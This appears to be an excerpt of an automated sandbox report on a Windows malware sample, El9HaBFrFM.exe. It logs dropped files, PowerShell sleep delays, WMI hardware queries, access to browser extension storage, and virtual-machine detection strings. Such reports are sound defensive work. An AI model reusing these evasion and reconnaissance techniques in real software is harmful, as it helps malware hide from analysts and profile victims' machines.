Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Users\user\AppData\Local\Temp\bound.exe	Memory allocated: 26C52A20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Memory allocated: 26C6C380000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3804	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2962	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2881
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2431
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1351
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1349
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1075
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2078

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17529

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

API coverage: 4.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep count: 3804 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep count: 2962 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep count: 2899 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 8008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep count: 2881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8256	Thread sleep count: 474 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8400	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep count: 1351 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2872	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep count: 1349 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920	Thread sleep count: 1075 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep count: 406 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288	Thread sleep count: 2078 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288	Thread sleep count: 92 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6BA3A83C0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,	0_2_00007FF6BA3A9280
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6BA3C1874
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,	1_2_00007FF6BA3A9280
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6BA3A83C0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6BA3C1874
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	83_2_00007FF6D7EF46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	83_2_00007FF6D7EEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F388E0 FindFirstFileExA,	83_2_00007FF6D7F388E0

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 1_2_00007FFDFB0D1230 GetSystemInfo,

1_2_00007FFDFB0D1230

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950531292.000001C1A8654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2948040188.000001C1A302B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rar.exe, 00000053.00000002.2143104282.000001B0DE23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: decodeqemu-ga
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 2Nf15vmsrvc
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685BB000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1891694555.000002506913E000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2253348238.0000025069125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f4vmusrvc
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: bound.exe, 00000012.00000002.1798455497.0000026C6CE1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\K x
